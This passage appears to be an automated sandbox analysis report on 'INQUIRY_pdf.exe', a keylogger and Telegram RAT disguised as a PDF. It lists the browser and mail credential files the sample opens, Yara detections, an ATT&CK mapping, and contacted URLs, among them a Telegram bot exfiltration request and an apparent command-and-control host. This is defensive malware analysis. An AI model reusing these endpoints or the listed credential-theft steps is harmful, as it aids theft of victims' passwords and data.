Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Users\user\Desktop\INQUIRY_pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.4162027017.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3ddf960.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3d9c940.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.INQUIRY_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INQUIRY_pdf.exe PID: 7448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: INQUIRY_pdf.exe PID: 7648, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3ddf960.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3d9c940.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.INQUIRY_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INQUIRY_pdf.exe PID: 7448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: INQUIRY_pdf.exe PID: 7648, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3ddf960.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3d9c940.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.INQUIRY_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4162027017.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INQUIRY_pdf.exe PID: 7448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: INQUIRY_pdf.exe PID: 7648, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.4162027017.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3ddf960.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3d9c940.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.INQUIRY_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INQUIRY_pdf.exe PID: 7448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: INQUIRY_pdf.exe PID: 7648, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3ddf960.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3d9c940.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.INQUIRY_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INQUIRY_pdf.exe PID: 7448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: INQUIRY_pdf.exe PID: 7648, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Security Software Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	1 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
INQUIRY_pdf.exe	24%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
INQUIRY_pdf.exe	100%	Avira	HEUR/AGEN.1305624
INQUIRY_pdf.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://checkip.dyndns.org/	false	high
https://reallyfreegeoip.org/xml/155.94.241.187	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20and%20Time:%2019/11/2024%20/%2010:54:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20364339%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.fontbureau.com/designersG	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/?	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/bThe	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B18000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	INQUIRY_pdf.exe, 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B18000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers?	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/#q=	INQUIRY_pdf.exe	false	high
http://www.tiro.com	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B12000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B5F000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B87000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.goodfont.co.kr	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002C26000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	INQUIRY_pdf.exe, 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
http://www.sajatypeworks.com	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.typography.netD	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/cThe	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/staff/dennis.htm	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B62000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003DB4000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003AED000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B18000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	INQUIRY_pdf.exe, 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/DPlease	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fonts.com	INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	false	high
